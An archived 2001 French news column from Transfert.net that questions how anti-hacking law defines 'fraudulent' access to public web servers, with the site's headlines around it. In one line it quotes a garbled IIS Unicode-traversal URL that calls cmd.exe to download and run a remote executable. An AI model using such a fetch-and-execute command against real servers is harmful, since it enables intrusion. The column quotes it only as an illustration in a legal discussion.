14 12 2019
Retour a la home
Rubrique Économie
Économie
Rubrique Société
Société
Rubrique Technologies
Technologies
Rubrique Culture
Culture
MOTS CLÉS
 
Tous les mots

DOSSIERS...
 Le projet |  L’équipe |  L’association |  Nos outils  | Actualités |  Sources |  Alertes  
Abonnés : connectez-vous

 
Oubli du mot de passe
TRANSFERT S'ARRETE
Transfert décryptait l'actualité des nouvelles technologies, proposait un fil info quotidien et une série d'outils de veille. Notre agence, refusant toute publicité, dépendait de ses abonnements.
  COPINAGES
Ecoutez Routine.
Protégez-vous.
Chiffre du jour
700 000
dépistages génétiques chaque année en Europe, selon la Commission européenne (...)
Revue de Web
 Lindows harcelé
 Cyberdissidents vietnamiens en appel
 Plus de CO2 = moins d’eau potable
Phrase du jour
"Ce service public que nous assurons a besoin de votre soutien pour perdurer"
L’association Inf’OGM, qui justifie la fin de la gratuité de son bulletin d’information (...)

Dossier
Le nucléaire mis au secret
Dossiers récents
 Racisme en ligne : l’affaire Sos-racaille
 Le fichage des passagers aériens
 La bataille des brevets logiciels
 L’impasse énergétique
 L’hydrogène, une énergie (presque) propre
Tous les dossiers
Spacer
Unes de la semaine

lundi 1er/12 Transfert.net

vendredi 28/11 Économie

jeudi 27/11 Société

mercredi 26/11 Culture

mardi 25/11 Économie

Spacer


27/06/2001 • 19h18

Sors de là, sale pirate (suite)

Je fraudule, tu fraudules, il fraudule...

"Frauduleusement"... Ce mot est particulièrement intéressant. Il sous-entend que le pirate réalise son action de mauvaise foi, dans le but de tromper, comme dirait le Petit Robert. Or, la page "lesnumeros.txt" du serveur mabelleboutiqueenligne.com va rapidement être archivée dans les moteurs de recherche si l’accès à ce répertoire est public. L’internaute lambda qui fait une recherche sur une chaîne de numéros ou sur un nom stockés dans cette page tombera fatalement dessus. Et le clic depuis Google lui sera fatal... "Non", crieront en cœur les juristes spécialistes de ce domaine. Car, pour incriminer un pirate, celui-ci doit avoir conscience de l’irrégularité de son acte... Même s’il n’a provoqué aucun dégât. Or notre internaute étourdi n’a pas conscience de commettre une quelconque irrégularité en cliquant sur un lien... Simple sur le papier, compliqué dans la réalité. D’autant que - et c’est également une nouveauté technique liée aux NTIC - les serveurs web peuvent être piratés avec quelques adresses trafiquées du genre mabelleboutiqueenligne.com/msdac/blabla_unicode..wint/sysem33export/cmd.exe
 ?/c+ftp.exe+hop.hop.hhop+GET+ndog.exe+c :TEMP dog.exe. De même que les informations essentielles d’une entreprise peuvent apparaître au détour d’une URL à peine modifiée (une faute de frappe, par exemple). Dans les logs (traces informatiques) du serveur, l’internaute devenu pirate apparaîtra comme un visiteur lambda. Anonyme (c’est le terme exact, par opposition à un utilisateur référencé du système). Ce qui est assez intéressant. Car l’accès à un "système de traitement automatisé de données" suppose que le système identifie l’accédant. Dans l’ancien temps de l’informatique, un identifiant et un mot de passe étaient demandés. Ce n’est plus le cas... Alors accès ou pas accès ? Le surf sur un serveur web public est-il un accès au serveur ? Une petite amélioration dans la définition de ce que l’on reproche aux pirates, en tenant compte des évolutions techniques liées à l’expansion des technologies IP, ne nuirait sans doute pas. Enfin, il n’est peut-être pas inutile de rappeler ce que l’on trouve sur www.arretonslemassacre.com, cause nationale 2000, menée par la Prévention Routière avec 13 associations. Il s’agit d’un petit descriptif de ce que risquent les chauffards qui tuent sur la route. À mettre en perspective avec ce qui se prépare pour les script-kiddies : "En 1987, un chauffard ivre, responsable de la mort d’une jeune fille, se voyait infliger par le tribunal correctionnel, puis par la cour d’appel, qu’une simple peine d’emprisonnement avec sursis et quelques milliers de francs d’amendes. Dix ans plus tard, les homicides involontaires commis sous l’empire d’un état alcoolique sont le plus souvent sanctionnés par de la prison ferme. Même s’il existe de fortes disparités entre les tribunaux, la peine dépasse rarement les six mois d’emprisonnement. Elle est toujours assortie d’une annulation du permis de conduire pour une durée variant de trois à cinq ans." Aux ...tats-Unis, la justice interdit déjà aux "pirates" comme Kevin Mitnick de toucher un quelconque ordinateur, à leur sortie de prison.

2
 
Dans la même rubrique

28/11/2003 • 18h33

La Criirad porte plainte contre la Cogema pour avoir diffusé des infos sur les déchets nucléaires

27/11/2003 • 17h14

La Cnil met les"étiquettes intelligentes" sur sa liste noire

26/11/2003 • 18h54

Un observatoire associatif pour lutter contre les inégalités

24/11/2003 • 22h09

EDF refuse d’étudier la résistance de l’EPR à une attaque de type 11-septembre

24/11/2003 • 18h36

La Grèce bannit la biométrie de ses aéroports à un an des Jeux olympiques
Dossier RFID
Les étiquettes "intelligentes"
Dernières infos

28/11/2003 • 19h29

Quand le déclin de la production pétrole mondiale va-t-il débuter ?

28/11/2003 • 19h19

Les réserves de pétrole sont dangereusement surévaluées, dénonce un groupe d’experts

27/11/2003 • 19h01

Un traité onusien veut obliger les belligérants à nettoyer les "résidus explosifs de guerre"

26/11/2003 • 19h06

"The Meatrix", un modèle de dessin animé militant, hilarant et viral

26/11/2003 • 18h47

Pour les Etats-Unis, les essais nucléaires ne sont pas encore de l’histoire ancienne

25/11/2003 • 19h13

Les hébergeurs indépendants ne sont toujours pas responsables, pour l’instant

25/11/2003 • 19h04

Les licences Creative Commons bientôt disponibles en français

24/11/2003 • 18h16

10 000 manifestants réclament la fermeture de la School of Americas

21/11/2003 • 19h36

Deux affaires judiciaires relancent la polémique sur la responsabilité des hébergeurs

21/11/2003 • 19h04

Un anti-raciste poursuivi en justice pour antisémitisme

21/11/2003 • 18h48

Le festival Jonctions confronte art, technologies et éthique

20/11/2003 • 19h28

Un fonctionnaire ne peut utiliser sa messagerie professionnelle à des fins religieuses

20/11/2003 • 19h00

Les technologies de surveillance automatisée tiennent salon au Milipol 2003

20/11/2003 • 18h22

Zouhaïr Yahyaoui libre, les cyberdissidents tunisiens restent harcelés par le régime

20/11/2003 • 16h29

Le site parodique Send Them Back milite pour le renvoi de tous les mp3 "volés" à la RIAA


Contacts |  Haut de page |  Archives
Tous droits réservés | © Transfert.net | Accueil
Logiciels libres |  Confidentialité |  Revue de presse